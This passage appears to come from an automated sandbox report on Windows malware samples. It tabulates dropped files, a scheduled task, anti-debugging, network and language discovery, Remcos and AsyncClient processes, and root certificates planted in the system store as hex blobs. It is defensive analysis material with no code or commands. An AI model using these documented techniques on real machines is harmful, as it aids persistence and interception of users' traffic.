| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\WPImages\\\\EmbeddedImage1.jpg" | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI | C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI | C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI | C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI | C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSIC837.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICC0E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f78c217.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f78c21c.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f78c21a.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC837.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC837.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICC0E.tmp-\CustomActions.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICC0E.tmp-\DispatchQueue.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\a\ctx.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC837.tmp-\DispatchQueue.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICC0E.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\0E7C0CA4E536483D943BE977EA796DD9.TMP\WiseCustomCalla2.dll | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f78c217.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f78c21a.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC759.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICC0E.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\0E7C0CA4E536483D943BE977EA796DD9.TMP\WiseCustomCalla.dll | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\0E7C0CA4E536483D943BE977EA796DD9.TMP\WiseCustomCalla3.dll | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC837.tmp-\CustomActions.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Embeds OpenSSL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\AsyncClient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\BWCStartMSI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\tester.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\null.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\null.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\in.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\ssg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Javvvum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000880101\ssg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\cx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000880101\ssg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\neptuno.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\TestExe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 